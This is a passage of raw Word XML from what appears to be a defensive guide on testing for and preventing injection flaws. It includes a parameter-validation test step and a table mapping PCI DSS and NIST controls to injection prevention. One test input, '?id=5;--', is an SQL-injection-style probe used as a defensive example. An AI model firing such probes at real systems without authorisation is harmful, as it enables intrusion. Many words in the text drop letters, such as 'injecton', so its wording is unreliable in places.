        <w:t xml:space="preserve"> ) into input fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D53122A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Parameter Validation Checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a test case that sends an invalid data type (e.g., text strings to an integer parameter like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>?id=5;--</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). The test must assert that the application server instantly drops the request with an explicit </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>400 Bad Request</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or validation error, proving the boundary defense layer is working.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC9852" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Regulatory Compliance Standards &amp; Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C4B11"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Prevention and testing of injection flaws are strictly mandated by global compliance frameworks. Failing to protect against them can result in immediate audit failure or legal non-compliance.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2532"/>
        <w:gridCol w:w="2286"/>
        <w:gridCol w:w="4532"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="27E8415B" w14:textId="77777777" w:rsidTr="00B064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F8BDBD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Compliance</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3493F186" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Specifc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Control /</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA570E1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Operatonal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Mandate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="6FF1DE6B" w14:textId="77777777" w:rsidTr="00B064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1FFCD4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>PCI DSS 4.0.1</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Payment</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cards)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A331068" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requirement 6.2.4</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>(Secure Coding) &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Requirement 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="040932E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Explicitly demands that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>organizatons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> follow</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">secure </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>sofware</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> development </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>practces</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">eliminate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>injecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>partcularly</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Injecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">. Requires annual </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>penetraton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>testng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>authentcated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> internal vulnerability scans.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="5C149B00" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CEE924D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>NIST SP 800-53 Rev. 5</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(US Federal/Enterprise)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="576F6F4F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Control SI-2</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Flaw</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Remediaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>RA-5</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>(Vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Scanning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="690E13A5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Mandates that federal </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>informaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> systems</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">and government contractors </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>contnuously</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">scan for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>applicaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>faws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> and implement</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>immediate, risk-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>prioritzed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
